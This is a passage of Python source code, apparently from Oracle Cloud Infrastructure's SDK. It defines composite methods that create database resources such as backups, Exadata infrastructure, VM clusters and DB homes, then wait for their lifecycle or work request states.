A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_backup(create_backup_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_backup(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_backup_destination_and_wait_for_state(self, create_backup_destination_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_backup_destination` and waits for the :py:class:`~oci.database.models.BackupDestination` acted upon
to enter the given state(s).
:param oci.database.models.CreateBackupDestinationDetails create_backup_destination_details: (required)
Request to create a new backup destination.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.BackupDestination.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_backup_destination`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_backup_destination(create_backup_destination_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_backup_destination(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_cloud_exadata_infrastructure_and_wait_for_work_request(self, create_cloud_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_cloud_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param oci.database.models.CreateCloudExadataInfrastructureDetails create_cloud_exadata_infrastructure_details: (required)
            Request to create a cloud Exadata infrastructure resource in an `Exadata Cloud Service`__ instance.

            __ https://docs.cloud.oracle.com/Content/Database/Concepts/exaoverview.htm

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_cloud_exadata_infrastructure`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_cloud_exadata_infrastructure(create_cloud_exadata_infrastructure_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']

        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_cloud_exadata_infrastructure_and_wait_for_state(self, create_cloud_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_cloud_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.CloudExadataInfrastructure` acted upon
        to enter the given state(s).

        :param oci.database.models.CreateCloudExadataInfrastructureDetails create_cloud_exadata_infrastructure_details: (required)
            Request to create a cloud Exadata infrastructure resource in an `Exadata Cloud Service`__ instance.

            __ https://docs.cloud.oracle.com/Content/Database/Concepts/exaoverview.htm

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.CloudExadataInfrastructure.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_cloud_exadata_infrastructure`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_cloud_exadata_infrastructure(create_cloud_exadata_infrastructure_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id

        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_cloud_exadata_infrastructure(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_cloud_vm_cluster_and_wait_for_work_request(self, create_cloud_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_cloud_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param oci.database.models.CreateCloudVmClusterDetails create_cloud_vm_cluster_details: (required)
            Request to create a cloud VM cluster. Applies to Exadata Cloud Service instances only. See `The New Exadata Cloud Service Resource Model`__ for information on this resource type.

            __ https://docs.cloud.oracle.com/iaas/Content/Database/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_cloud_vm_cluster`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_cloud_vm_cluster(create_cloud_vm_cluster_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']

        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_cloud_vm_cluster_and_wait_for_state(self, create_cloud_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_cloud_vm_cluster` and waits for the :py:class:`~oci.database.models.CloudVmCluster` acted upon
        to enter the given state(s).

        :param oci.database.models.CreateCloudVmClusterDetails create_cloud_vm_cluster_details: (required)
            Request to create a cloud VM cluster. Applies to Exadata Cloud Service instances only. See `The New Exadata Cloud Service Resource Model`__ for information on this resource type.

            __ https://docs.cloud.oracle.com/iaas/Content/Database/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.CloudVmCluster.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_cloud_vm_cluster`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_cloud_vm_cluster(create_cloud_vm_cluster_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id

        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_cloud_vm_cluster(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_console_connection_and_wait_for_state(self, create_console_connection_details, db_node_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_console_connection` and waits for the :py:class:`~oci.database.models.ConsoleConnection` acted upon
        to enter the given state(s).

        :param oci.database.models.CreateConsoleConnectionDetails create_console_connection_details: (required)
            Request object for creating a ConsoleConnection

        :param str db_node_id: (required)
            The database node `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ConsoleConnection.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_console_connection`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_console_connection(create_console_connection_details, db_node_id, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id

        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_console_connection(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_data_guard_association_and_wait_for_work_request(self, database_id, create_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_data_guard_association` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param str database_id: (required)
            The database `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param oci.database.models.CreateDataGuardAssociationDetails create_data_guard_association_details: (required)
            A request to create a Data Guard association.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_data_guard_association`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_data_guard_association(database_id, create_data_guard_association_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']

        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_data_guard_association_and_wait_for_state(self, database_id, create_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
        to enter the given state(s).

        :param str database_id: (required)
            The database `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param oci.database.models.CreateDataGuardAssociationDetails create_data_guard_association_details: (required)
            A request to create a Data Guard association.

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_data_guard_association`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_data_guard_association(database_id, create_data_guard_association_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id

        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_data_guard_association(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_database_and_wait_for_work_request(self, create_new_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_database` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param oci.database.models.CreateDatabaseBase create_new_database_details: (required)
            Request to create a new database.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_database`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_database(create_new_database_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']

        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_database_and_wait_for_state(self, create_new_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_database` and waits for the :py:class:`~oci.database.models.Database` acted upon
        to enter the given state(s).

        :param oci.database.models.CreateDatabaseBase create_new_database_details: (required)
            Request to create a new database.

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_database`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_database(create_new_database_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id

        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_database(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_database_software_image_and_wait_for_work_request(self, create_database_software_image_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_database_software_image` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param oci.database.models.CreateDatabaseSoftwareImageDetails create_database_software_image_details: (required)
            Request to create database software image.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_database_software_image`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_database_software_image(create_database_software_image_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']

        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_database_software_image_and_wait_for_state(self, create_database_software_image_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_database_software_image` and waits for the :py:class:`~oci.database.models.DatabaseSoftwareImage` acted upon
        to enter the given state(s).

        :param oci.database.models.CreateDatabaseSoftwareImageDetails create_database_software_image_details: (required)
            Request to create database software image.

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DatabaseSoftwareImage.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_database_software_image`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_database_software_image(create_database_software_image_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id

        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_database_software_image(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_db_home_and_wait_for_work_request(self, create_db_home_with_db_system_id_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_db_home` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param oci.database.models.CreateDbHomeBase create_db_home_with_db_system_id_details: (required)
            Request to create a new Database Home.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_db_home`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_db_home(create_db_home_with_db_system_id_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']

        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_db_home_and_wait_for_state(self, create_db_home_with_db_system_id_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_db_home` and waits for the :py:class:`~oci.database.models.DbHome` acted upon
        to enter the given state(s).

        :param oci.database.models.CreateDbHomeBase create_db_home_with_db_system_id_details: (required)
            Request to create a new Database Home.

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbHome.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_db_home`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_db_home(create_db_home_with_db_system_id_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id

        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_db_home(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_exadata_infrastructure_and_wait_for_work_request(self, create_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param oci.database.models.CreateExadataInfrastructureDetails create_exadata_infrastructure_details: (required)
            Request to create Exadata Cloud@Customer infrastructure.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_exadata_infrastructure`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_exadata_infrastructure(create_exadata_infrastructure_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']

        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_exadata_infrastructure_and_wait_for_state(self, create_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.ExadataInfrastructure` acted upon
        to enter the given state(s).

        :param oci.database.models.CreateExadataInfrastructureDetails create_exadata_infrastructure_details: (required)
            Request to create Exadata Cloud@Customer infrastructure.

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataInfrastructure.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_exadata_infrastructure`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_exadata_infrastructure(create_exadata_infrastructure_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id

        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_exadata_infrastructure(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
    def create_external_backup_job_and_wait_for_work_request(self, create_external_backup_job_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.create_external_backup_job` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param oci.database.models.CreateExternalBackupJobDetails create_external_backup_job_details: (required)
            Request to create a cloud backup resource for a database running outside the cloud.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_backup_job`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.create_external_backup_job(create_external_backup_job_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']

        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_container_database_and_wait_for_work_request(self, create_external_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalContainerDatabaseDetails create_external_container_database_details: (required)
Request to create a new external container database resource.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_container_database(create_external_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_container_database_and_wait_for_state(self, create_external_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_container_database` and waits for the :py:class:`~oci.database.models.ExternalContainerDatabase` acted upon
